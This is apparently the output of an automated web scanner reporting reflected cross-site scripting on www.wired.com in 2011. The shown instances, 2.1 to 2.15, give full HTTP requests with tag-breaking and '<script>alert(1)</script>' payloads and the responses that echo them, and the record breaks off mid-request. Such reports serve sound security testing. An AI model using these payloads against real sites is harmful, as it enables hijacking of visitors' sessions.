<a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_719323216001_IBM-WATSON-T.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001">IBM and the Jeopardy! Challenge</a></li>
        <li class="videoDesc">An IBM supercomputer named Watson will compete against Jeopardy! champions Ken Jennings and Brad Rutter this February. Watch the trailer.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>







var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";

















































var bc_gBaseURL = "http://www.wired.com/video/";
var bc_gTitl
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 20 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205d9"><a>249a37450e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax205d9"><a>249a37450e2/widgets/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:06 GMT
Date: Wed, 12 Jan 2011 12:59:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax205d9"><a>249a37450e2 ss_widgets c_related">
...[SNIP]...

2.2. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26766"><a>ac7204c3476 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets26766"><a>ac7204c3476/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:11 GMT
Date: Wed, 12 Jan 2011 12:59:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets26766"><a>ac7204c3476 c_related">
...[SNIP]...

2.3. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892c1"><a>b717fa44b47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related892c1"><a>b717fa44b47/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Wed, 12 Jan 2011 13:03:00 GMT
Date: Wed, 12 Jan 2011 12:59:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related892c1"><a>b717fa44b47">
...[SNIP]...

2.4. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1ea2a--><script>alert(1)</script>e16b1ceae38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:11:43 GMT
Date: Wed, 12 Jan 2011 05:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

2.5. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc9"><a>2661fde8d90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services84fc9"><a>2661fde8d90/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:09:56 GMT
Date: Wed, 12 Jan 2011 05:05:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services84fc9"><a>2661fde8d90 ss_dart c_init">
...[SNIP]...

2.6. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload afcbe--><script>alert(1)</script>6fa95a9452b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:09:39 GMT
Connection: close
Set-Cookie: JSESSIONID=cabZwTKl-2_Lv4oyrO41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

2.7. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94545"><a>aa0843de90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart94545"><a>aa0843de90d/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:07:52 GMT
Connection: close
Set-Cookie: JSESSIONID=cabTzf5URbO2QfkB3N41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart94545"><a>aa0843de90d c_init">
...[SNIP]...

2.8. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e526"><a>ca37ef5da9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart/init3e526"><a>ca37ef5da9c/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:19:47 GMT
Date: Wed, 12 Jan 2011 05:09:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart c_init3e526"><a>ca37ef5da9c">
...[SNIP]...

2.9. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 70510--><script>alert(1)</script>b4ecd010e4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28689
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:21:23 GMT
Date: Wed, 12 Jan 2011 05:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel
-->
...[SNIP]...

2.10. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6bfc8<script>alert(1)</script>41b5de530a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/dart/init/threatlevel/kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/javascript; charset=UTF-8
Content-Length: 249
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 05:21:56 GMT
Date: Wed, 12 Jan 2011 05:11:56 GMT
Connection: close


CN.dart.init({site:'wiredcom.dart', zone: 'threatlevel;', kws:[ "kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel"], charmap : {' ' : '+', '-' : '_'}});



2.11. http://www.wired.com/user/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6e4"><a>5dd758f037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user6e6e4"><a>5dd758f037d/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:23 GMT
Date: Wed, 12 Jan 2011 05:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user6e6e4"><a>5dd758f037d ss_login">
...[SNIP]...

2.12. http://www.wired.com/user/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c812"><a>5f7d13f6048 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/login1c812"><a>5f7d13f6048 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:01 GMT
Connection: close
Set-Cookie: JSESSIONID=cabM-CK_HDwqVgt0cP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_login1c812"><a>5f7d13f6048">
...[SNIP]...

2.13. http://www.wired.com/user/logout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7759e"><a>e2aad4de1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user7759e"><a>e2aad4de1c1/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:28 GMT
Date: Wed, 12 Jan 2011 05:08:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user7759e"><a>e2aad4de1c1 ss_logout">
...[SNIP]...

2.14. http://www.wired.com/user/logout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e31"><a>04439d0209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/logout68e31"><a>04439d0209d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:12:54 GMT
Connection: close
Set-Cookie: JSESSIONID=abcwtLdaCQT637ylbP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_logout68e31"><a>04439d0209d">
...[SNIP]...

2.15. http://www.wired.com/user/registration [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6859"><a>f18010a37e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere6859"><a>f18010a37e9/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
